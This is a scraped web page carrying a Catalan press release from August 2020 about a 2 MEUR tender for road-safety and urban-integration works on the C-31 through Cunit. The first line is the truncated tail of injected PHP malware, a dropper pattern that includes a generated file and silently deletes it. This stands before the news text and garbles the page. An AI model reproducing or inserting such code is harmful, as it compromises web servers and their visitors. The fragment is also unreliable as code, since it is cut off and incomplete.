");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Territori i Sostenibilitat impulsa obres d'integració urbana i de millora de la seguretat viària a la C-31 a Cunit per un valor de 2 MEUR
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Territori i Sostenibilitat impulsa obres d'integració urbana i de millora de la seguretat viària a la C-31 a Cunit per un valor de 2 MEUR (12/08/2020)

El Departament de Territori i Sostenibilitat ha iniciat la licitació, per un import de 2 MEUR, de les obres per al condicionament de la C-31 al seu pas pel nucli urbà de Cunit. Els treballs permetran millorar la integració urbana de la carretera i afavorir la mobilitat i la seguretat viària en aquest entorn. Es preveu que les obres comencin abans de final d’any i tinguin un termini d’execució de sis mesos.

Al seu pas per Cunit, la C-31 registra una intensitat mitjana diària de prop de 20.200 vehicles. Els treballs abastaran un tram de dos quilòmetres de la carretera i inclouran tot un conjunt d’actuacions de millora de la mobilitat i la seguretat viària, tant pel que fa a vehicles, com a vianants i ciclistes. Així, les principals millores que es duran a terme corresponen a:

• Creació d’un carril bici, bidireccional, de 2 metres d’amplada.

• Ampliació de voreres existents i creació de nous trams de vorera per a formar en tot el tram un itinerari per a vianants, amb una amplada mínima de 2 metres.

• Creació de nous passos per a vianants, desplaçament d’alguns passos i millora dels existents. Inclou la millora de la visibilitat, amb la reordenació de places d’estacionament properes als passos i millores en la protecció dels vianants.

• Construcció d’un parterre elevat a la mitjana del tronc de la C-31, en un tram d’un quilòmetre, per evitar que els vianants travessin la via fora dels passos establerts

• Reducció de l’amplada dels carrils de circulació dels vehicles de la calçada central de la C-31, per a pacificar el trànsit.

• Construcció d’una nova rotonda a l’alçada del carrer Montblanc, en substitució de l’actual intersecció en “T.

• Renovació del paviment en el tronc principal de la carretera i calçada lateral dreta.

• Reordenació de diversos àmbits per a millorar la canalització del trànsit i la seguretat en la mobilitat:

• Dels accessos dels carrils laterals a la rotonda d’encreuament amb l’avinguda Mediterrani, tot anuŀlant els accessos directes actuals. També s’amplien les voreres per tal de millorar la seguretat al pas de vianants.

• Dels enllaços en el carril lateral al costat muntanya, en el tram comprès entre el carrer d’Enric Granados i la cruïlla amb la carretera de Cunit a Clariana.

• A l’àmbit de la Plaça Generalitat, s’habilitarà una nova entrada i una nova sortida a la plaça des de la C-31 i s’eliminarà l’accés actual.

• A l’entorn de la rotonda d’accés al carrer de les Figueretes.

• A la zona d’una parada de bus al costat dret de la C-31, amb l’ampliació de la vorera i el desplaçament de la marquesina.

• Adaptació de la secció transversal de la calçada al pont sobre l’Avinguda de la Font, tot reduint l’amplada dels carrils de la via i encabint el nou carril bici pel voral dret existent.

• Eixamplament de la passareŀla de vianants existent per sobre del torrent d’en Pedro, tot ampliant l’actual dels 0,90 metres als 4 previstos, necessaris per encabir la vorera i el carril bici.

Aquestes actuacions es complementaran amb l’adequació de la senyalització horitzontal i vertical de codi i d’orientació. Així mateix, es reforçaran les elements d’abalisament, en especial en els creuaments amb els passos de vianants.

Font: Departament de Territori i Sostenibilitat

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona